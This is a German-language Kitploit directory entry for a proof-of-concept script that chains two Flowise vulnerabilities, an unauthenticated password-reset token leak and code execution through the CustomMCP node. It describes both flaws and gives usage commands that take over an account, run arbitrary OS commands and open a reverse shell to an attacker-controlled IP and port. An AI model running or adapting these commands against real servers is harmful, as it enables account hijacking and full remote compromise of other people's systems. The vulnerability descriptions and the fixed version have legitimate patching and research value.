Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-58434-59528 — CVE-2025-58434 und CVE-2025-59528 Chain-POC | Kitploit
Tools/GitHubGitHub/azureadtrent/cve-2025-58434-59528
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungRemote-Access-Tool
GitHubazureadtrent/cve-2025-58434-59528

CVE-2025-58434-59528

CVE-2025-58434 und CVE-2025-59528 Chain-POC

Repository anzeigen
43vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-58434 + CVE-2025-59528

Exploit-Kette für zwei Schwachstellen, die Flowise <= 3.0.5 betreffen.


Schwachstellen

CVE-2025-58434 — Nicht authentifizierte Account-Übernahme

Der Forgot-Password-Endpunkt gibt ein gültiges Passwort-Reset-Token in der API-Antwort zurück, ohne eine Authentifizierung zu erfordern. Ein Angreifer, der eine gültige E-Mail-Adresse kennt, kann das Passwort eines beliebigen Kontos ohne Benutzerinteraktion zurücksetzen.

CVE-2025-59528 — Authentifizierte Remote-Codeausführung

Der CustomMCP-Knoten übergibt benutzergesteuerte Eingaben direkt an einen Function()-Konstruktor mit vollen Node.js-Berechtigungen. Ein authentifizierter Benutzer mit einem gültigen API-Key kann beliebige Betriebssystembefehle als Benutzer des Flowise-Prozesses ausführen.

Behoben in: Flowise 3.0.6


Voraussetzungen

  • Python 3.8+
  • pip install requests

Verwendung

Vollständige ATO-Kette (setzt Passwort zurück, fordert API-Key an, startet Reverse-Shell):

root@kitploit:~
python3 flowise_chain.py -t http://target -e [email protected]

Nur RCE (wenn Sie bereits einen API-Key haben):

root@kitploit:~
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"

Reverse-Shell mit vorhandenem Key:

root@kitploit:~
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444

Optionen

FlagBeschreibung
-t, --targetZiel-URL
-e, --emailE-Mail des Zielkontos (löst ATO-Kette aus)
--api-keyAPI-Key direkt angeben (überspringt ATO)
-c, --commandAuszuführender Befehl
--lhostAngreifer-IP für Reverse-Shell
--lportAngreifer-Port für Reverse-Shell (Standard: 4444)
--new-passwordPasswort für den Reset (Standard: Pwn3d!2026)
-k, --insecureTLS-Überprüfung überspringen

Hinweise

Aufgrund einer Eigenart in Flowise 3.0.5 aktualisiert der Reset-Passwort-API-Endpunkt nicht sofort die vom Login-Endpunkt akzeptierten Anmeldeinformationen. Das Skript pausiert nach dem Reset und fordert Sie auf, sich manuell in der Benutzeroberfläche anzumelden und den API-Key von /apikey zu kopieren.

Tool herunterladen